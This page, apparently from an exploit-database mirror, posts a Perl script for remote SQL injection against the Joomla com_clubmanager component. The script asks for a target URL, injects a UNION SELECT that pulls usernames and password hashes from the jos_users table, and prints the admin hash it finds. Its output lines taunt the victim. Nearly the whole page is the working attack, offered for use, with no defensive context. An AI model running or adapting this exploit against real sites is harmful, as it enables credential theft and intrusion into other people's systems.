Home / os / win7

[webapps / 0day] - Joomla Component com_clubmanager Exploit

Posted on 07 October 2010

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>Joomla Component com_clubmanager Exploit | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='Joomla Component com_clubmanager Exploit by Fl0riX in webapps / 0day | Inj3ct0r - exploit database : vulnerability : 0day : shellcode' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></head><body><pre>======================================== Joomla Component com_clubmanager Exploit ======================================== #!/usr/bin/perl -w ######################################## #[~] Author : Fl0riX #[!] Script Name: Joomla com_clubmanager ######################################## print &quot; &quot;; print &quot; Fl0rix | Bug Researchers &quot;; print &quot; &quot;; print &quot; Joomla com_clubmanager Remote SQL Injection Exploit &quot;; use LWP::UserAgent; print &quot; Site ismi Target page:[http://wwww.site.com/path/]: &quot;; chomp(my $target=&lt;STDIN&gt;); $florix=&quot;concat(username,0x3a,password)&quot;; $sakkure=&quot;jos_users&quot;; $com=&quot;com_clubmanager&quot;; $cw=&quot;+UNION+SELECT+&quot;; $b = LWP::UserAgent-&gt;new() or die &quot;Could not initialize browser &quot;; $b-&gt;agent(&#039;Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)&#039;); $host = $target . &quot;/index.php?option=&quot;.$com.&quot;&amp;tabla=equip&amp;task=presenta&amp;cm_id=284&quot;.$cw.&quot;1,&quot;.$florix.&quot;,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from/**/&quot;.$sakkure.&quot;+--+&quot;; $res = $b-&gt;request(HTTP::Request-&gt;new(GET=&gt;$host)); $answer = $res-&gt;content; if ($answer =~/([0-9a-fA-F]{32})/){ print &quot; [+] Admin Hash : $1 &quot;; print &quot;# Baba Buyuksun bea Bu is bu kadar xD # &quot;; } else{print &quot; [-] Malesef Olmadi Aga bir dahaki sefere &quot;; # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-10-07]</pre></body></html>

 

TOP